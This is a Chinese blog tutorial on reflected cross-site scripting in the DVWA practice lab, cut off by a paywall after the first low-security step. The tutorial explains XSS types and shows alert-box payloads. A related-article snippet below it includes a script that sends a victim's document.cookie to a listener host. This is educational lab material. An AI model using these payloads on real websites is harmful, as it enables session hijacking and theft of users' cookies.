Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)

最新推荐文章于 2024-08-14 08:00:00 发布
最新推荐文章于 2024-08-14 08:00:00 发布
阅读量4.2k 收藏 37
点赞数 5
分类专栏: Kali渗透测试 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43625577/article/details/89917893
版权

目录

一、XSS

      1、XSS简介

      2、XSS类型

      3、漏洞形成的根源

二、反射型XSS

      1、原理示意图​

      2、实验环境

      3、实验步骤

           安全级别:LOW

                   重定向

                   获取cookie

           安全级别:Medium

           安全级别:High

           安全级别:Impossible

一、XSS

1、XSS简介

        XSS,跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的。

2、XSS类型

  • 反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。
  • 存储型XSS:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie。
  • DOM型XSS:文本对象模式XSS,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。

3、漏洞形成的根源

  • 服务器对用户提交的数据过滤不严;
  • 提交给服务器端的脚本被直接返回给其他客户端执行;
  • 脚本在客户端执行恶意操作;

二、反射型XSS

1、原理示意图

获取cookie

  1. 黑客首先向服务器发送js脚本
  2. 服务器将含有js脚本的页面发给黑客
  3. 黑客将js脚本的页面的url发送给被攻击方
  4. 黑客获取被攻击方的cookie

重定向

  1. 黑客首先向服务器发送js脚本
  2. 服务器将含有js脚本的页面发给黑客
  3. 黑客将js脚本的页面的url发送给被攻击方
  4. 被攻击方点击url重定向到第三方网站

2、实验环境

1、测试机:物理机Windows 10,远程登录DVWA;安装BurpSuite

2、DVWA服务器:Windows Server 2003(192.168.247.129),启动phpStudy。

3、实验步骤

安全级别:LOW

查看源码

源码分析

       从源码中可以看到,直接引用来 name参数,并没有对输入的参数做任何过滤;例如:输入a,则返回含有 ' Hello a ' 的js页面。

1、直接嵌入html:<script>alert(‘xss’)</script>,弹出弹框xss。

使用Burpsuite抓包查看,返回的页面信息为含有输入信息的js页面; 

最低0.47元/天 解锁文章
浅浅爱默默
关注
专栏目录
dvwaxss反射
Alonegrief的博客
12-01 868
Xss漏洞原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的 反射XSS跨站,不是长期可以加载恶意代码的,并不留存于网站代码中,这种攻击是需要诱导客户去点击特定的URL地址才能触发。 例子: Xss反射: 打开dvwa,安全级别调为low 发现这有个输入框,尝试的输入点什么进去 发现会直接返回“Hello xxx” 测试xss可以直接在有输入框的位置插入代码 发现直接执行弹窗,1
DVWA-XSS (Reflected)-反射XSS
seanyang_的博客
06-12 3189
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
XSS跨站脚本攻击)——原理、基本类与应用(反射、存储
最新发布
m0_74249600的博客
08-14 1298
本文讲述了XSS的原理以及两种基本类反射、存储的讲解与靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
DVWA反射XSS
追风筝的孩子
08-15 588
       这反射XSS的三个等级的代码进行分析,最高级的不讲。 一:LOW等级 1、服务器端核心代码 &lt;?php // Is there any input? if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) { // Feedback for end u...
N10 DVWA 反射XSS
尐猴子君ii的博客
08-25 231
一、概念 XSS,全称Cross Site Scripting,跨站脚本攻击。在页面中注入恶意的脚本代码,当受害者访问该页面是,恶意代码会在其浏览器上执行。XSS不仅仅限于JavaScript,还包含Flash等其他脚本语言。根据恶意代码是否存储在服务器上,XSS可以分为存储性的XSS反射性的XSS。 DOMXSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用的document.baby.innerHtml等函数动态生成的Html页面,如果这些函数在引用某些变量时没
DVWA靶机-反射XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4112
DVWA靶机-反射XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
Kali渗透测试DVWA系列5——存储XSS(跨站脚本攻击)
浅浅的博客
05-11 2918
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
DVWA系列(三)——使用Burpsuite进行反射XSS反射跨站脚本攻击
橘子女侠
05-05 3853
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; (3)JavaScript 与J...
DVWA系列XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1466
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射、只决定于输出地方 在反射XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWA测试XSS跨站脚本攻击三种类
WINDY_PACE的博客
05-04 1790
测试XSS三种类危害最大的存储如何无声息钓鱼获取到用户信息
DVWAXSS(Reflected)反射XSS
RexHa的博客
10-07 2165
dvwa 反射XSS
DVWA通关--反射XSSXSS (Reflected))
箭雨镜屋
12-16 2038
LOW 通关步骤 源码分析
DVWA】--- 九、反射XSS(XSS Reflected)
qq_43168364的博客
05-31 744
XSS Reflected 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 这输入的内容会回显出来 构造js代码:<script>alert(/hack/)</script>,会出现弹窗 此时前端的html中已经有我们插入的代码了 但是当我们再点击以下改模块时面的代码就会消失,这就是反射XSS它时临时的 代码审计 header(“X-XSS-Protection: 0”):X-XSS-Prot
DVWA--反射XSS(Reflected)攻略详解
Silver_lion的博客
08-13 7140
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
DVWA------反射XSS
Z_Grant的博客
08-25 1327
文章目录一,XSS中常用的JS代码和HTML元素(1)普通使用(2) 获得cookie和重定向(3)引入脚本文件二,DVWA的学习(1)低级1.1 重定向1.2 获取cookie1.3 kali监听获取目标的cookie(2)中级2.1 绕过方法2.1.1 大写 script2.1.2 复写2.1.3 使用其他没有被过滤的标签(3)高级(4)impossible4.1 绕过方法三,php常用的过滤...
结合DVWA反射XSS浅析
qq_43660551的博客
01-08 2733
一.概念 XSS跨站脚本攻击。黑客通过HTML注入篡改了网页,在网页中插入恶意脚本。 二.分类 1.反射XSS:简单地把用户输入的数据反射给浏览器。 2.存储XSS:将用户输入的数据存储在服务器端。 3.DOMXSS:通过修改页面的DOM节点形成XSS。 三.DVWA-XSS实践 1.低级 看下源码,这无任何过滤。直接将用户的输入反射给浏览器。 故直接构造payload语句:<script>alert(/This is XSS!/)</s...
DVWA-Xss(reflected)(反射跨站脚本攻击
简简的博客
02-02 1740
系列文集:DVWA学习笔记 反射Xss &amp;amp;amp;lt;全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。&amp;amp;amp;gt; xss攻击思路 ##Low: 点击右下角的view source,查看源码 分析: arrary_key_exists()函数:判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值...
xss跨站脚本攻击kali
07-27
对于XSS跨站脚本攻击)和Kali Linux(一个流行的渗透测试工具)这两个话题,我可以分别给你一些简要的解释。 XSS跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在目标网站中注入恶意脚本,使得这些脚本在用户浏览器中执行。这样,攻击者就可以利用用户的会话信息、篡改网页内容、重定向用户等,从而实现各种恶意行为。为了防止XSS攻击,开发人员应该对用户输入进行严格的过滤和转义,以确保不会执行恶意脚本。 Kali Linux是一个基于Debian的Linux发行版,专门用于渗透测试和网络安全评估。它内置了大量的渗透测试工具和漏洞利用框架,方便安全专业人员进行各种安全测试和评估活动。由于这些工具的功能强大,Kali Linux一般只在合法授权和合规测试的情况下使用,不应该被用于非法活动。 请注意,使用Kali Linux或进行任何形式的网络攻击都需要遵守法律和道德规范。未经授权的渗透测试活动可能会导致严重的法律后果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值